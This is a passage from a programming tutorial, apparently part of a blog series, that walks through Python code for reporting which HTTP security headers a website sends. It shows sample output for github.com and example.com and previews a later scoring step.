for header_name, header_data in headers_result['headers'].items():
Loop through each header we checked.
if header_data['present']:
    value = header_data['value']
    if len(value) > 50:
        value = value[:50] + "..."
    print(f" ✓ {header_name}")
    print(f" {value}")
If the header exists, print a checkmark and its value. Long values get truncated for readability.
else:
    print(f" ✗ {header_name} - MISSING")
    print(f" ({header_data['description']})")
If the header is missing, print an X and explain what it does. This helps users understand what protection is missing.
Part 15: Test It
python analyzer.py github.com
You should see output like:
Security Headers:
URL: https://github.com/
Status: 200
✓ Strict-Transport-Security
max-age=31536000; includeSubdomains; preload
✓ Content-Security-Policy
default-src 'none'; base-uri 'self'; child-sr...
✓ X-Frame-Options
deny
✓ X-Content-Type-Options
nosniff
✓ Referrer-Policy
strict-origin-when-cross-origin
✓ Permissions-Policy
accelerometer=(), autoplay=(), camera=(), cro...
GitHub sends all six headers on our list.
Try a simpler site:
python analyzer.py example.com
Security Headers:
URL: https://example.com/
Status: 200
✗ Strict-Transport-Security - MISSING
(Forces HTTPS connections)
✗ Content-Security-Policy - MISSING
(Controls allowed content sources)
✗ X-Frame-Options - MISSING
(Prevents clickjacking attacks)
✗ X-Content-Type-Options - MISSING
(Prevents MIME type sniffing)
✗ Referrer-Policy - MISSING
(Controls referrer information leakage)
✗ Permissions-Policy - MISSING
(Controls browser feature access)
example.com sends none of the six headers on our list, which is common for simple placeholder sites.
Commit Your Progress
git add .
git commit -m "Add HTTP security headers analysis"
git push origin main
What's Next
Our domain analyzer now checks:
DNS records (A, MX, SPF, DMARC)
SSL certificate validation
HTTP security headers
In the next post, we'll create a security scoring system — combining all these checks into a single 0-100 score with specific recommendations.
See you in the next one.
Find the code for this post on GitHub.